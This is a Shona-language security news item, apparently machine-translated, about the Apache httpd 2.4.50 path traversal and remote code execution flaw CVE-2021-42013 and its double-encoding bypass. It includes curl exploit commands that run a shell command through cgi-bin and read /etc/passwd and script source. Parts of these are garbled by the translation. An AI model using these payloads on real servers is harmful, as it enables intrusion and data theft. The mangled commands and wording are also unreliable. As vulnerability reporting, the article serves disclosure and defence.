A new attack vector yawanikwa yeApache http server, iyo yakaramba isina kugadziriswa mukuvandudza 2.4.50 uye inobvumira kuwana mafaera kubva kunzvimbo dziri kunze kwesaiti dhairekitori. Mukuwedzera, vatsvakurudzi vakawana nzira inobvumira, pamberi pezvimwe zvisiri-standard marongero, kwete chete kuverenga mafaira ehurongwa, asiwo kuita kure kure kodhi yavo pane server. Dambudziko rinongowanikwa mukuburitswa 2.4.49 uye 2.4.50; shanduro dzekare hadzina kukanganiswa. Kubvisa kusagadzikana kutsva, Apache httpd 2.4.51 yakakurumidza kuburitswa.
Papakati payo, dambudziko idzva (CVE-2021-42013) rakafanana zvachose nekusagadzikana kwepakutanga (CVE-2021-41773) mu2.4.49, mutsauko chete ndeye encoding yakasiyana ye ".." mavara. Kunyanya, mukusunungurwa 2.4.50 kukwanisa kushandisa kutevedzana "% 2e" kuvharidzira poindi yakavharwa, asi mukana weiyo kaviri encoding wakapotswa - pakutsanangura kutevedzana "%% 32% 65", sevha yakaitsanangura. mu "%2e" uyezve mu ".", i.e. iwo "../" mavara ekuenda kudhairekitori rapfuura anogona kukodha se ".%%32%65/".
Kana zviri zvekushandisa kusazvibata kuburikidza nekuita kodhi, izvi zvinogoneka kana mod_cgi ikagoneswa uye nzira yepasi inoshandiswa inotenderwa kuitwa kweCGI zvinyorwa (semuenzaniso, kana iyo ScriptAlias directive yakagoneswa kana iyo ExecCGI mureza yakatsanangurwa mu Options directive). Chinhu chinosungirwa kurwiswa kwakabudirira zvakare kupa pachena mukana kune madhairekitori ane mafaera anogona kuitiswa, senge / bhini, kana kuwana kune iyo faira system mudzi "/" mune maApache marongero. Sezvo kuwana kwakadaro kusingawanzo kupihwa, kodhi kuuraya kurwiswa kune kushoma application kune chaiwo masisitimu.
Panguva imwecheteyo, kurwiswa kwekuwana zviri mukati mearbitrary system mafaira uye zvinyorwa zvinyorwa zvewebhu zvinyorwa, zvinoverengwa nemushandisi pasi iyo http server iri kushanda, inoramba yakakosha. Kuita kurwisa kwakadai, zvakakwana kuve nedhairekitori pane saiti yakagadziriswa uchishandisa "Alias" kana "ScriptAlias" dhairekitori (DocumentRoot haina kukwana), senge "cgi-bin".
Muenzaniso wechiitiko chinokutendera kuti uite "id" zvinoshandiswa paseva: curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%% 32%65/.%% 32%65/.%%32%65/bin/sh' —data 'echo Content-Type: text/plain; echo; id' uid=1(daemon) gid=1(daemon) mapoka=1(daemon)
Muenzaniso wezviitiko zvinokutendera kuti uratidze zviri mukati me /etc/passwd uye imwe yewebhu script (kuburitsa iyo script kodhi, dhairekitori rinotsanangurwa kuburikidza ne "Alias" rairo, iro iro script script risingagoneswe, rinofanira kutsanangurwa. seyokutanga dhairekitori): curl 'http://192.168.0.1 .32/cgi-bin/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %65%192.168.0.1/etc/passwd' curl 'http: //32/aliaseddir/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %%65%2/usr/local/apacheXNUMX/cgi -bin/test.cgi'
Dambudziko rinonyanya kukanganisa kuenderera kwakagadziridzwa kugovera seFedora, Arch Linux neGentoo, pamwe nemadoko eFreeBSD. Mapakeji mumapazi akagadzikana eanochengetedza sevha anogovera Debian, RHEL, Ubuntu uye SUSE haana kukanganiswa nekusagadzikana. Dambudziko harisi kuitika kana kuwana madhairekitori kwarambwa zviripachena uchishandisa "inoda zvese zvakarambwa".
Source: opennet.ru